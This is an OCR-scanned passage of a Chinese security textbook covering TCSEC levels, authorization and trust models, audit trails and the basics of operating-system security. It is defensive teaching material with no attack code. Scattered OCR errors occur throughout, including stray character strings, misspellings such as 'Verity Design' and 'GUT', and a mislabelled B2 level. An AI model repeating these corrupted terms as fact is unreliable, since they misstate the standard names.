敏感 标识 控制 下 的 主体 和 客体 都 有 标识 。 

Bl 级 称 为 标识 安全 保护 (Labeled Security Protection), B2 级 称 为 结构 保护 级 别 
(Security Protection) ,要 求 所 有 对 象 (包括 设备 .端口 等 ) 都 有 安全 标签 以 实现 低级 别 的 用 
户 不 能 访问 敏感 信息 。B3 级 别称 为 安全 域 保 护 级 别 (Security Domain) ,使 用 安装 硬件 的 方 
式 来 加 强 域 的 安全 ,引用 监视 器 参与 所 有 主体 对 客体 的 存 取 以 保证 不 存在 旁 路 。 审 计 跟 踪 
可 以 提供 系统 恢复 过 程 ;支持 安全 管理 员 角 色 。 

A 级 别 验证 设计 级 (Verity Design) 是 目前 最 高 的 安全 级 别 。 在 A 级 别 中 ,安全 的 设计 
必须 给 出 形式 化 设计 说 明和 验证 ,需要 有 严格 的 数学 推导 过 程 ,同时 应 该 包含 秘密 信道 和 可 
信 分 布 的 分 析 , 也 就 是 说 要 保证 系统 的 部 件 来 源 有 安全 保证 ,例如 对 这 些 软 件 和 硬件 在 生 
产 .销售 .运输 中 进行 严密 跟踪 和 严格 的 配置 管理 ,以 避免 出 现 安全 隐患 。 


5.5 授 权 


授权 能 实现 访问 控制 提供 主体 和 客体 一 定 的 安全 防护 ,确保 不 会 有 非法 者 访问 合法 或 
敏感 信息 ,也 确保 合法 者 能 够 正确 使 用 信息 资源 ,从 而 实现 安全 的 分 级 管理 。 

访问 控制 的 主体 能 够 访问 与 使 用 客体 的 信息 资源 的 前 提 是 主体 必须 获得 授权 ,授权 与 
访问 控制 密 不 可 分 ,授权 是 建立 和 分 发 信任 的 基础 。 

1. 授权 概念 

授权 是 资源 的 所 有 者 或 者 控制 者 准许 他 人 访问 这 种 资源 ,是 实现 访问 控制 的 前 提 。 授 
权 也 指 客体 授予 主体 一 定 的 权力 ,通过 这 种 权力 ,主体 可 以 对 客体 执行 某 种 操作 行为 ,例如 
登录 ,查看 文件 ,修改 数据 ,管理 账户 等 。 对 于 简单 的 个 体 和 不 太 复 杂 的 群体 ,可 以 考虑 基于 
个 人 和 组 的 授权 。 

授权 行为 是 指 主体 履行 被 客体 授予 权力 的 那些 活动 。 因 此 ,访问 控制 与 授权 密 不 可 分 。 
授权 表示 的 是 一 种 信任 关系 ,需要 建立 一 种 模型 对 这 种 关系 进行 描述 。 

2. 授权 的 管理 

授权 的 管理 决定 谁 能 被 授权 修改 允许 的 访问 ,可 分 为 强制 访问 控制 的 授权 管理 、 自 主 访 
问 控制 的 授权 管理 和 角色 访问 控制 的 授权 管理 。 

(1) 强制 访问 控制 的 授权 管理 。 强 制 访问 控制 中 ,允许 的 访问 控制 完全 是 根据 主体 和 
客体 的 安全 级 别 决定 。 其 中 主体 (用 户 、 进 程 ) 的 安全 级 别 是 由 系统 管理 员 赋予 用 户 ,而 客体 
的 安全 级 别 则 由 系统 根据 创建 它们 的 用 户 的 安全 级 别 决定 。 因 此 ,强制 访问 控制 的 管理 策 
略 是 比较 简单 的 ,只 有 安全 管理 员 能 够 改变 主体 和 客体 的 安全 级 别 。 
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(2) 自主 访问 控制 的 授权 管理 。 自 主 访问 控制 的 授权 管理 有 如 下 几 种 方式 : 

。 集中 式 管 理 。 指 单个 的 管理 者 或 组 对 用 户 进行 访问 控制 授权 和 授权 撤销 。 

。 分 级 式 管理 。 一 个 中 心 管理 者 把 管理 责任 分 配给 其 他 管理 员 , 这 些 管理 员 再 对 用 户 
进行 访问 授权 和 授权 撤销 。 分 级 式 管理 可 以 根据 组 织 结构 而 实行 。 

。 所 属 权 管理 。 如 果 一 个 用 户 是 一 个 客体 的 所 有 者 , 则 该 用 户 可 以 对 其 他 用 户 访问 该 


客体 进行 授权 访问 和 授权 撤销 。 
。 协作 式 管 理 。 对 于 特定 系统 资源 的 访问 不 能 由 单个 用 户 授权 决定 ,而 必须 要 其 他 用 
户 的 协作 授权 决定 。 


。 分散 式 管理 。 在 分 散 管理 中 ,客体 所 有 者 可 以 把 管理 权限 授权 给 其 他 用 户 。 

(3) 角色 访问 控制 的 授权 管理 。 角 色 访 问 控 制 提供 了 类 似 自由 访问 控制 的 许多 管理 策 
略 。 而 且 , 管 理 权限 的 委托 代理 是 角色 访问 控制 管理 的 重要 特点 ,在 前 面 两 种 访问 控制 的 管 
理 策略 中 都 不 存在 。 

3. 信任 模型 

信任 模型 (Trust Model) 是 指 建立 和 管理 信任 关系 的 框架 。 信 任 关 系 是 这 样 一 种 情形 ， 
如 果 主 体能 够 符合 客体 所 假定 的 期 望 值 ,那么 称 客体 对 主体 是 信任 的 。 信 任 关系 可 以 使 用 
期 望 值 来 衡量 ,用 信任 度 表 示 。 主 客体 间 建 立信 任 关 系 的 范畴 称 为 信任 域 ,也 就 是 主客 体 和 
信任 关系 的 范畴 集合 ,信任 域 是 服从 于 一 组 公共 策略 的 系统 集 。 

信任 模型 有 三 种 基本 类 型 , 层次 信任 模型 .网 状 信任 模型 和 对 等 信任 模型 。 

4. 信任 管理 系统 

信任 管理 需要 解决 的 问题 就 是 在 实际 中 是 由 谁 在 管理 信任 以 及 信任 的 凭据 。 这 种 关系 
反映 在 信任 管理 中 ,怎样 实现 和 约束 正确 的 信任 关系 来 访问 资源 和 进行 交易 ,建立 相应 的 信 
任 关系 。 

信任 管理 包含 了 两 个 方面 :一 个 是 对 于 信任 链 的 维护 与 管理 ,一 个 是 对 信任 域 间 信 任 关 
系 的 管理 与 维护 。 用 户 是 信任 的 主要 参与 者 ,因此 用 户 有 必要 对 信任 链 加 以 管理 ,也 就 是 说 
应 该 由 用 户 自己 来 判断 是 否 该 相信 谁 和 该 相信 什么 ,信任 域 的 管理 通常 由 认证 机 构 来 负责 。 


5.6 审计 跟踪 


审计 是 对 访问 控制 的 重要 内 容 与 必要 补充 ,是 访问 控制 的 一 个 重要 内 容 。 审 计 可 以 对 
用 户 使 用 何 种 信息 资源 、 使 用 的 时 间 , 以 及 如 何 使 用 (执行 何 种 操作 ) 进 行 记 录 与 监控 。 

1. 审计 跟踪 概述 

审计 是 通过 记录 和 分 析 各 种 用 户 和 系统 活动 操作 记录 和 信息 资料 ,发 现 系统 漏洞 .改进 
系统 性 能 和 安全 。 系 统 活动 包括 操作 系统 和 应 用 程序 进程 的 活动 ;用 户 活动 包括 用 户 在 系 
统 中 使 用 何 种 资源 ,使 用 的 时 间 和 执行 何 种 操作 等 活动 。 

安全 审计 的 目标 是 对 潜在 的 攻击 者 起 到 震慑 和 警告 的 作用 ,为 评估 损失 ,灾难 恢复 提供 
依据 ,为 系统 管理 员 提供 有 效 的 系统 使 用 日 志 ,及 时 发 现 人 侵 行为 或 潜在 的 系统 漏洞 。 

审计 的 意义 在 于 客体 对 其 自身 安全 的 监控 ,便于 查 漏 补缺 ,追踪 异常 事件 ,从 而 达到 威 
慑 和 追踪 不 法 使 用 者 的 目的 。 审 计 和 监控 是 实现 系统 安全 的 最 后 一 道 防线 ,处 于 系统 的 最 
高 层 。 
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审计 跟踪 是 系统 活动 的 流水 记录 。 该 记录 按 事件 从 始 至 终 的 途径 ,顺序 检查 、 审 查 和 检 
验 每 个 事件 的 环境 及 活动 。 审 计 跟 踪 通 过 书面 方式 提供 应 负责 任 人 员 的 活动 证 据 以 支持 访 
问 控制 职能 的 实现 (职能 是 指 记录 系统 活动 并 可 以 跟踪 到 对 这 些 活动 应 负责 任 人 员 的 
能 力 )。 

审计 跟踪 记录 系统 活动 和 用 户 活动 。 通 过 借助 适当 的 工具 和 规程 ,审计 跟踪 可 以 发 现 
违反 安全 策略 的 活动 .影响 运行 效率 的 问题 以 及 程序 中 的 错误 。 

审计 跟踪 不 但 有 助 于 帮助 系统 管理 员 确保 系统 及 其 资源 免 遭 非法 授权 用 户 的 侵害 , 同 
时 还 能 提供 对 数据 恢复 的 帮助 。 审 计 与 监控 能 够 再 现 原 有 的 进程 和 问题 ,这 对 于 责任 追查 
和 数据 恢复 非常 有 必要 。 

安全 审计 的 类 型 分 为 系统 级 审计 ,应 用 级 审计 和 用 户 级 审计 。 系 统 级 审计 主要 记录 登 
录 、 登 录 识 别 号 ,每 次 登录 尝试 的 日 期 和 时 间 、 所 访问 的 资源 等 。 应 用 级 审计 主要 记录 打开 
和 关闭 数据 文件 , 读 取 、 编 辑 和 删除 ,修改 等 。 用 户 级 审计 主要 记录 用 户 直 接 启 动 的 所 有 命 
令 ,用 户 所 有 的 鉴别 和 认证 尝试 、 所 访问 的 文件 和 资源 等 方面 。 

2. 审计 内 容 

审计 跟踪 可 以 实现 多 种 安全 相关 目标 ,包括 个 人 职能 、 事 件 重建 ,入 侵 检测 和 故障 分 析 。 

(1) 个 人 职能 (Individual Accountability) 。 审 计 跟 踪 是 管理 人 员 用 来 维护 个 人 职能 的 
技术 手段 。 如 果 用 户 知道 他 们 的 行为 活动 被 记录 在 审计 日 志 中 ,相应 的 人 员 需 要 为 自己 的 
行为 负责 ,他 们 就 不 太 会 违反 安全 策略 和 绕 过 安全 控制 措施 。 

允许 用 户 访 问 特定 资源 意味 着 用 户 要 通过 访问 控制 和 授权 实现 他 们 的 访问 ,被 授权 的 
访问 有 可 能 会 被 滥用 ,导致 敏感 信息 的 扩散 , 当 无 法 阻止 用 户 通过 其 合法 身份 访问 资源 时 ， 
审计 跟踪 就 能 发 挥 作 用 。 审 计 跟 踪 可 以 用 于 检查 和 检测 他 们 的 活动 。 

(2) 事件 重建 (Reconstruction of Events) 。 在 发 生 故 障 后 ,审计 跟踪 可 以 用 于 重建 事 
件 和 数据 恢复 。 通 过 审查 系统 活动 的 审计 跟踪 可 以 比较 容易 地 评估 故障 损失 ,确定 故障 发 
生 的 时 间 .原因 和 过 程 。 通 过 对 审计 跟踪 的 分 析 就 可 以 重建 系统 和 协助 恢复 数据 文件 ,同时 
还 有 可 能 避免 下 次 发 生 此 类 故障 的 情况 。 

(3) 入 侵 检测 (Intrusion Detection) 。 审 计 跟 踪 记 录 可 以 用 来 协助 人 侵 检 测 工作 。 如 
果 将 审计 的 每 一 笔记 录 都 进行 上 下 文 分 析 , 就 可 以 实时 发 现 或 是 过 后 预防 入 侵 检 测 活动 。 
实时 入 侵 检测 可 以 及 时 发 现 非法 授权 者 对 系统 的 非法 访问 ,也 可 以 探测 到 病毒 扩散 和 网 络 
攻击 。 

(4) 故障 分 析 (Problem Analysis) 。 审 计 跟 踪 可 以 用 于 实时 审计 或 监控 。 例 如 审计 中 
踪 可 以 记录 改动 前 和 改动 后 的 记录 ,以 确定 是 哪个 操作 者 在 什么 时 候 做 了 哪些 实际 的 改动 ， 
这 可 以 帮助 管理 层 确 定 错误 到 底 是 由 用 户 ,操作 系统 、 应 用 软件 还 是 由 其 他 因素 造成 的 。 

3. 安全 审计 系统 的 基本 结构 

安全 审计 系统 的 基本 结构 如 图 5. 22 所 示 ,由 事件 审计 发 生 器 .日 志 记录 器 .日 志 分 析 
器 .审计 规则 库 .日 志文 件 和 分 析 报 告 等 组 成 。 

4. 日 志 审计 的 内 容 

在 理想 情况 下 ,日 志 应 该 记录 每 个 可 能 的 事件 ,以 便 分 析 发 生 的 所 有 事件 ,并 恢复 任何 
时 刻 进行 的 历史 情况 。 但 这 样 存储 量 过 大 ,并 且 将 严重 影响 系统 的 性 能 。 因 此 ,记录 每 一 个 
数据 包 , 每 一 个 命令 显然 不 现实 。 日 志 的 内 容 应 该 是 有 选择 的 ,一 般 情况 下 日 志 的 记录 应 该 
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器 盱 济 半 开 


其 他 事件 


审计 分 析 报 告 
图 5.22 安全 审计 系统 的 基本 结构 


满足 如 下 的 原则 : 

(1) 日 志 应 该 记录 任何 必要 的 事件 ,以 检测 已 知 的 攻击 模式 。 

(2) 日 志 应 该 记录 任何 必要 的 事件 ,以 检测 异常 的 攻击 模式 。 

(3) 日 志 应 该 记录 关于 系统 连续 可 靠 的 工作 信息 。 

日 志 系 统 根据 安全 要 求 记录 上 面 事件 的 部 分 或 全 部 。 通 常 ,对 于 一 个 事件 ,日 志 应 包括 
事件 发 生 的 日 期 和 时 间 、 引 发 事件 的 用 户 ( 地 址 ) 事 件 、 源 与 目的 的 位 置 、 事 件 类 型 事件 成 
败 等 。 


本 章 小 结 


访问 控制 是 主体 对 客体 提出 的 访问 请 求 后 ,对 这 一 申请 、 批 准 、 允 许 、 撤 销 的 全 过 程 进行 
的 有 效 控 制 , 从 而 确保 只 有 符合 控制 策略 的 主体 才能 合法 访问 。 实 现 访 问 控制 的 目的 在 于 
提供 主体 和 客体 一 定 的 安全 防护 ,确保 不 会 有 非法 者 使 用 合法 或 敏感 信息 ,也 确保 合法 者 能 
够 正确 使 用 信息 资源 ,从 而 实现 安全 的 分 级 管理 。 

访问 控制 涉及 主体 .客体 和 访问 策略 ,三 者 之 间 关系 的 实现 构成 了 不 同 的 访问 模型 , 访 
问 控制 模型 是 访问 控制 实现 的 基础 。 访 问 控制 模型 包括 自主 访问 控制 模型 (DAC) 和 强制 
访问 控制 模型 (MAC)。 其 他 还 有 基于 角色 的 访问 控制 模型 (RBAC) ,基于 任务 的 访问 控制 
模型 (TBAC) ,基于 对 象 的 访问 控制 模型 (OBAC) 和 信息 流 模 型 。BLP 模型 和 Biba 模型 属 
于 MAC。 

针对 不 同 的 访问 控制 模型 会 有 不 同 的 访问 控制 策略 ,访问 控制 策略 的 制定 应 该 符合 安 
全 原则 , 即 最 小 特权 原则 .最 小 泄露 原则 和 多 级 安全 策略 。 访 问 控制 策略 的 具体 实现 有 基于 
身份 的 安全 策略 和 基于 规则 的 安全 策略 两 种 方式 ,可 以 用 控制 表 (ACL) ,控制 矩阵 (ACMD) 、 
能 力 表 (CL) 和 安全 标签 列表 4 种 不 同 的 机 制 加 以 实现 。 

访问 控制 的 最 终 目的 是 通过 访问 控制 策略 显 式 地 准许 或 限制 主体 的 访问 能 力 及 范围 
从 而 有 效 地 限制 和 管理 合法 用 户 对 关键 资源 的 访问 ,防止 和 追踪 非法 用 户 的 侵入 以 及 合法 
用 户 的 不 慎 操 作 等 行为 对 权威 机 构造 成 的 破坏 。 

授权 是 资源 的 所 有 者 或 者 控制 者 准许 他 人 访问 这 种 资源 ,是 实现 访问 控制 的 前 提 。 授 
权 也 指 客体 授予 主体 一 定 的 权力 ,通过 这 种 权力 ,主体 可 以 对 客体 执行 某 种 操作 行为 。 
访问 控制 的 主体 能 够 访问 与 使 用 客体 的 信息 资源 的 前 提 是 主体 必须 获得 授权 ,授权 与 
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访问 控制 密 不 可 分 。 授 权 的 几 种 模型 是 建立 和 分 发 信任 的 基础 。 

审计 是 访问 控制 的 重要 内 容 与 补充 ,审计 可 以 对 用 户 使 用 何 种 信息 资源 、 使 用 的 时 间 、 
以 及 如 何 使 用 进行 记录 与 监控 。 审 计 的 意义 在 于 客体 对 其 自身 安全 的 监控 ,便于 查 漏 补缺 ， 
追踪 异常 事件 ,从 而 达到 威慑 和 追踪 不 法 使 用 者 的 目的 。 


习题 5 


5.1 什么 是 访问 控制 ? 访问 控制 包括 哪 几 个 要 素 ? 

5.2 什么 是 自主 访问 控制 ? 什么 是 强制 访问 控制 ? 什么 是 基于 角色 的 访问 控制 ? 这 三 种 
访问 控制 有 什么 区 别 ? 说 说 你 会 在 什么 情况 下 选择 强制 访问 控制 。 

强制 访问 控制 是 如 何 实现 的 ? 它 与 自主 访问 控制 的 区 别 在 哪里 ? 

访问 控制 策略 有 哪 几 种 ?应 符合 什么 安全 原则 ? 

举例 说 明 访问 控制 表 和 访问 能 力 表 的 联系 和 区 别 。 

审计 的 重要 意义 在 于 什么 ? 审计 的 内 容 包 括 哪 些 ? 审计 系统 由 哪些 模块 组 成 ? 


a en cn a 
Dn 
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第 6 章 操作 系统 安全 
6.1 操作 系统 安全 概述 


操作 系统 是 管理 计算 机 软 、 硬 件 资源 的 一 个 重要 平台 ,所 以 操作 系统 的 安全 是 计算 机 系 
统 安全 的 核心 。 操 作 系统 安全 是 信息 系统 安全 的 基础 , 它 在 信息 系统 整体 安全 中 起 着 至 关 
重要 的 作用 ,离开 操作 系统 安全 ,整个 系统 如 建 在 沙滩 上 的 城堡 。 对 操作 系统 (OS) 进 行 攻 
击 是 黑客 永恒 的 目标 ,突破 了 (OS) 的 防御 ,就 有 机 会 得 到 计算 机 系统 的 秘密 ,就 有 机 会 控制 
应 用 程序 的 运行 。 

操作 系统 安全 指 操作 系统 中 的 安全 性 研究 ,主要 通过 身份 鉴别 .自主 访问 控制 .标记 和 
强制 访问 控制 ,数据 流 控制 .审计 、 数 据 完整 性 ,数据 保密 性 等 几 个 方面 来 实现 系统 的 安全 需 
要 。 安 全 操作 系统 指 满足 某 安全 等 级 的 操作 系统 。 安 全 威胁 的 主要 根源 是 系统 软件 设计 的 
脆弱 性 ,构成 系统 漏洞 ,无 法 抵御 各 种 攻击 OS 的 威胁 如 病毒 蠕虫、 逻辑 炸弹 、 木 马 .天窗 。 
天 窗 是 由 程序 员 赔 在 操作 系统 里 的 一 段 代码 ,渗透 者 利用 其 侵入 操作 系统 而 不 受 检查 ,由 专 
门 的 命令 激活 ,不 易 发 现 。 


6.1.1 操作 系统 构成 


操作 系统 是 计算 机 硬件 .软件 资源 的 管理 者 ,管理 对 象 包括 CPU 存储器、 外 部 设备 、 信 
息 (数据 和 软件 ) ;管理 的 内 容 有 资源 的 当前 状态 (数量 和 使 用 情况 ) .资源 的 分 配 、. 回 收 和 访 
问 操作 ,相应 管理 策略 (包括 用 户 权限 )。 

OS 是 用 户 使 用 系统 硬件 .软件 的 接口 ,通过 系统 命令 (命令 行 菜单 式 ,命令 脚本 式 、 图 
形 用 户 接 口 GUT) 和 系统 调用 (形式 上 类 似 于 过 程 调 用 ,在 应 用 编程 中 使 用 ) 来 执行 管理 计 
算 机 资源 的 任务 ,如 图 6. 1 所 示 。 


1. 用 户 接口 
(图 形 或 命令 行 方式 ) 


2. 设备 管理 


6. 文 件 管理 


3. 存储 管理 


5. 保 护 与 安全 


4. 进程 管理 


图 6.1 操作 系统 结构 


操作 系统 安全 


OS 是 计算 机 裸 机 的 扩展 机 (Extended Machine) 或 虚拟 机 (Virtual Machine) 。 在 裸 机 
上 添加 设备 管理 .文件 管理 .存储 管理 (针对 内 存 和 外 存 )、 处 理 机 管理 (针对 CPU 合理 组 织 
工作 流程 ) ,作业 管理 和 进程 管理 等 资源 的 分 类 模块 处 理 。 其 中 进程 管理 主要 是 对 处 理 器 进 
行 管理 ,解决 处 理 器 实施 分 配 调度 策略 ,协调 多 道 程序 间 的 关系 ;存储 管理 是 管理 内 外 存 资 
源 , 内 外 存 结合 实现 虚拟 存储 器 ,解决 内 存 不 够 问题 ;文件 管理 是 信息 资源 以 文件 方式 存放 
在 外 存 , 管 理 以 提供 方便 、 安 全 的 访问 ;作业 管理 是 为 用 户 提供 使 用 机 器 的 手段 ;设备 管理 是 
管理 所 有 1/O 设备 及 其 支持 设备 。 


6.1.2 安全 操作 系统 功能 


操作 系统 的 功能 要 求 是 可 靠 的 ,基本 完成 设计 功能 ,允许 有 不 影响 系统 功能 的 缺陷 ; 操 
作 系统 的 安全 要 求 杜 绝 与 安全 相关 的 每 个 漏洞 ,不 允许 系统 存在 缺陷 。 操 作 系 统 的 功能 要 
求 与 安全 要 求 是 一 对 矛盾 ,设计 时 应 考虑 综合 平衡 。 

操作 系统 的 安全 性 是 整个 计算 机 系统 安全 性 的 基石 ,所 以 一 个 安全 的 操作 系统 应 该 具 
有 以 下 功能 : 

(1) 有 选择 的 访问 控制 。 有 选择 的 访问 控制 包括 使 用 多 种 不 同 的 方式 来 限制 计算 机 环 
境 下 对 特定 对 象 的 访问 ,对 计算 机 的 访问 可 以 通过 用 户 名 和 密码 组 合 及 物理 限制 来 控制 ;对 
目录 或 文件 级 的 访问 则 可 以 由 用 户 和 组 策略 来 控制 。 在 操作 系统 设计 的 初期 定义 有 选择 的 
访问 控制 是 很 重要 的 。 

(2) 内 存 管理 与 对 象 重 用 。 内 存 管理 是 操作 系统 安全 中 的 一 个 重要 组 成 部 分 。 在 复杂 
的 虚拟 内 存 管理 器 出 现 之 前 ,将 含有 机 密 信息 的 内 容 保 存在 内 存 中 的 风险 是 很 大 的 。 系 统 
中 的 内 存 管理 器 必须 能 够 隔离 每 个 不 同 进程 所 使 用 的 内 存 。 在 进程 终止 且 内 存 将 被 重用 之 
前 ,必须 在 再 次 访问 它 之 前 将 其 中 的 内 容 清空 。 

(3) 审计 能 力 。 安 全 系统 应 该 具备 审计 能 力 ,以 便 测试 其 完整 性 ,并 可 追踪 任何 可 能 的 
安全 破坏 活动 。 审 计 功 能 至 少 包 括 可 配置 的 事件 跟踪 能 力 、 事 件 浏览 和 报表 功能 、 审 计 事 
件 , 审 计 日 志 访 问 等 。 

(4) 加 密 数据 传送 。 加 密 数 据 传送 保证 了 在 网 络 中 传送 时 被 截获 的 信息 不 能 被 未 经 身 
份 认证 代理 所 访问 。 针 对 窃听 和 自 改 ,加 密 数据 具有 很 强 的 保护 作用 。 

(5) 加 密 文件 系统 。 对 文件 系统 加 密 保证 了 文件 只 能 被 具有 访问 权 的 用 户 所 访问 , 文 
件 加 密 和 解密 的 方式 对 用 户 来 说 应 该 是 透明 的 。 

(6) 安全 进程 间 通 信 机 制 。 进 程 间 通信 也 是 给 系统 安全 带 来 威胁 的 一 个 主要 因素 ,应 
对 进程 间 的 通信 机 制 做 一 些 必要 的 安全 检查 ,要 禁止 高 安全 等 级 进程 通过 进程 间 通 信 的 方 
式 传递 信息 给 低 安 全 等 级 进程 。 

只 要 有 了 上 述 这 些 最 底层 的 安全 功能 ,各 种 混 为 “应 用 软件 ”的 病毒 .木马 程序 网 络 入 
侵 和 人 为 非法 操作 才能 被 真正 抵制 ,因为 它们 违背 了 操作 系统 的 安全 规则 ,也 就 失去 了 运行 
的 基础 。 


6.1.3 操作 系统 的 安全 措施 


在 计算 机 发 展 史上 出 现 过 许多 不 同 的 操作 系统 ,其 中 最 为 常用 的 有 DOS、Windows、 
Linux、UNIX/Xenix 和 0S/2 这 5 种 。 当 前 网 络 中 使 用 最 广泛 的 操作 系统 主要 有 基于 NT 
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技术 的 Windows 操作 系统 和 UNIX 操作 系统 。 操 作 系 统 功 能 越 来 越 复杂 ,规模 越 来 越 庞 
大 ,每 千 行 代码 的 bug 约 在 5~50 个 之 间 。 

操作 系统 安全 措施 主要 是 指 操作 系统 访问 控制 权限 的 合理 设置 系统 的 及 时 更 新 、 莉 
防范 以 及 安全 系统 的 备份 与 恢复 4 个 方面 。 

1. 合理 设置 

操作 系统 访问 控制 权限 的 合理 设置 主要 是 指 利用 操作 系统 的 访问 控制 功能 ,为 用 户 和 
文件 系统 建立 恰当 的 访问 控制 权限 ,对 于 用 户 和 重要 文件 的 访问 控制 权限 是 否 得 当 , 直 接 影 
响 到 系统 的 安全 稳定 和 信息 的 完整 与 保密 。 

2. 及 时 更 新 

及 时 升级 操作 系统 是 系统 安全 管理 的 一 个 重要 方面 。 及 时 地 更 新 系统 ,能 修正 操作 系 
统 中 已 发 现 的 问题 ,会 使 整个 系统 的 安全 人 性、 稳定 性 . 易 用 性 得 到 大 幅度 提高 。 目 前 绝 大 多 
数 操作 系统 都 有 自己 的 系统 更 新 网 站 。 例 如 Windows 操作 系统 更 新 网 址 是 http: // 
windowsupdate. microsoft. com, 只 要 定期 访问 该 网 站 或 者 订阅 该 操作 系统 的 邮件 列表 ,发 
现 新 的 安全 缺陷 后 ,就 可 以 很 快 地 采取 应 对 措施 。 

3. 攻击 防范 

攻击 防范 主要 是 指 对 于 各 种 可 能 的 攻击 ,比如 利用 系统 缓冲 区 溢出 攻击 、 利 用 TCP/IP 
缺陷 进行 的 拒绝 服务 攻击 ,要 进行 恰当 合理 的 预先 防范 。 随 着 利用 操作 系统 安全 缺陷 进行 
攻击 方法 的 不 断 出 现 ,对 各 类 攻击 的 防范 是 操作 系统 安全 防护 的 一 个 重要 内 容 。 

4. 备份 与 恢复 

操作 系统 应 保证 在 初始 的 安全 ,干净 状态 下 做 好 备份 ,在 使 用 一 段 时 间 后 难免 受到 恶意 
代码 攻击 或 其 他 污染 ,可 能 产生 使 用 不 畅 或 不 安全 ,因此 应 定期 恢复 安全 干净 的 系统 。 


6.2 安全 操作 系统 


操作 系统 安全 需求 指 设计 一 个 安全 操作 系统 时 期 望 得 到 的 安全 保障 ,一 般 要 求 系统 无 
错误 配置 .无 漏洞 .无 后 门 .无 特洛伊 木马 等 ,能 防止 非法 用 户 对 计算 机 资源 的 非法 存 取 。 
操作 系统 安全 需求 包括 : 

。 机密 性 (Confidentiality) 需 求 。 为 秘密 数据 提供 保护 方法 及 保护 等 级 的 一 种 特性 。 

。 完整 性 (Integrity) 需 求 。 系 统 中 的 数据 和 原始 数据 未 发 生变 化 ,未 遭 到 偶然 或 恶意 
修改 或 破坏 时 所 具有 的 一 种 性 质 。 

。 可 记 账 性 (Accountability) 需 求 。 又 称 为 审计 , 指 要 求 能 证 实用 户 身份 ,可 对 有 关 安 
全 的 活动 进行 完整 记录 、 检 查 和 审核 ,以 防止 用 户 对 访问 过 某 信息 或 执行 过 某 操 作 
的 否认 。 

。 可 用 性 (Availability) 需 求 。 防 止 非法 独占 资源 ,每 当 合法 用 户 需 要 时 保证 其 访问 到 
所 需 信息 ,为 其 提供 所 需 服务 。 


6.2.1 安全 操作 系统 概念 


安全 操作 系统 是 指 计算 机 操作 系统 在 自主 访问 控制 强制 访问 控制 标记、 身份 鉴别 、 客 
体重 用 、 审 计数 据 完整 性 ,隐蔽 信道 分 析 、 可 信 路 径 和 可 信人 恢 复 10 个 方面 满足 相应 的 安全 
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安全 操作 系统 的 主要 特征 如 下 : 

(1) 最 小 特权 原则 , 即 每 个 特权 用 户 只 拥有 能 进行 其 工作 的 权力 。 

(2) 自主 访问 控制 和 强制 访问 控制 ,包括 保密 性 访问 控制 和 完整 性 访问 控制 。 

(3) 安全 审计 。 

(4) 安全 域 隔离 。 

1. 可 信 软 件 与 可 信 计 算 基 

常见 的 程序 类 型 有 下 面 几 种 ,可 信 程 序 是 本 身 运 行 安全 ,系统 安全 依赖 于 对 其 无 错 操 
作 ,通常 指 系统 程序 。 良 性 程序 是 本 身 不 保证 安全 运行 ,通过 权限 控制 ,系统 认为 它 不 有 意 
违反 规则 ,通常 指 用 户 程序 和 应 用 程序 :恶意 程序 是 有 意 对 系统 进行 破坏 ,如 病毒 。 

良性 程序 和 恶意 程序 统称 为 不 可 信 软 件 ,它们 位 于 安全 周 界外 ,系统 设计 应 不 允许 其 破 
坏 操 作 系统 。 可 信 软 件 指 由 可 信人 员 按 严格 标准 开发 ,并 证 明了 的 软件 。 它 只 与 安全 有 关 ， 
位 于 安全 周 界 内 , 它 的 故障 会 对 系统 安全 造成 不 良 影响 。 

在 理论 的 计算 范围 内 ,软件 的 功能 仅 受 限于 设计 者 的 智力 一 一 只 要 问题 事实 上 可 以 解 
决 (理论 范围 ) ,程序 员 就 可 以 用 软件 来 实现 。 这 意味 着 操作 系统 提高 强大 的 开发 能 力 的 同 
时 也 对 安全 实体 授权 保护 造成 困难 。 

可 信 计 算 基 (Trusted Computing Base, TCB) 是 指 具体 实现 安全 策略 的 可 信和 软件 和 硬 
件 及 安全 管理 人 员 的 集合 。 它 建立 了 一 个 基本 的 保护 环境 并 提供 一 个 可 信 计 算 机 系统 所 要 
求 的 附加 用 户 服务 。TCB 的 软件 部 分 是 安全 操作 系统 的 核心 , 它 能 完成 以 下 任务 : 内 核 的 
安全 运行 ,标识 系统 中 的 每 个 用 户 、 保 持 用 户 到 TCB 登录 的 可 信 路 径 .实施 主体 对 客体 的 访 
问 控制 .维护 TCB 功能 的 正确 性 和 监视 及 记录 系统 中 发 生 的 有 关 事 件 。 

2. 操作 系统 的 主体 和 客体 

安全 实体 是 被 保护 的 信息 或 资源 。 主 体 是 一 个 主动 的 实体 ,是 系统 内 行为 的 发 起 者 , 通 
常 它 是 用 户 和 代表 用 户 的 进程 ,发 起 事件 请 求 。 客 体 是 一 个 被 动 的 实体 ,是 系统 内 所 有 主体 
行为 的 直接 承担 者 , 它 可 以 是 数据 ,也 可 以 是 进程 。 客 体 常 被 分 成 一 般 客体 、 设 备 客体 和 特 
殊 客 体 。 一 般 客体 是 系统 内 以 具体 形式 存在 的 信息 实体 ,如 文件 .目录 数据 和 程序 等 ;设备 
客体 指 系统 内 的 硬件 设备 ,如 磁盘 、 磁 带 . 显 示 器 .打印 机 和 网 络 节点 等 ;特殊 客体 是 指 承担 
主体 进程 行为 的 一 类 进程 。 

操作 系统 中 主体 与 客体 的 划分 是 动态 的 ,与 时 间 相关 的 。 例 如 ,进程 是 用 户 的 客体 ,又 
是 访问 对 象 的 主体 。 该 服务 链 上 最 原始 的 主体 是 用 户 ,最终 的 客体 是 数据 。 

操作 系统 保护 机 制 间 在 对 系统 中 大 量 主体 进行 认证 ,确保 它们 被 授权 来 使 用 系统 中 的 
任何 安全 实体 。 三 个 主要 安全 问题 是 认证 ,授权 和 可 信 通 道 。 

系统 中 每 个 主客 体 都 要 命名 。 每 个 对 象 (进程 文件. 设备) 都 有 名 字 、 地 址 和 位 置 ,名 字 
是 对 象 的 抽象 标识 ,地 址 是 存 取 对 象 的 路 径 ,位 置 是 对 象 的 地 点 。 它 们 放 在 目录 上 下 文中 解 
释 , 网 络 环境 下 用 一 个 名 字 服 务 器 的 机 制 来 存储 。 客 户 用 名 字 服 务 器 把 名 字 解 析 为 地 址 , 然 
后 按照 要 求 通过 地 址 访问 网 络 ; 网 络 把 请 求 传递 到 服务 器 的 位 置 , 在 那 把 请 求 交 给 服务 器 ， 

主体 属性 是 用 户 特征 ,是 系统 用 来 决定 访问 控制 的 常用 因素 ,其 敏感 标记 包括 用 户 ID/ 
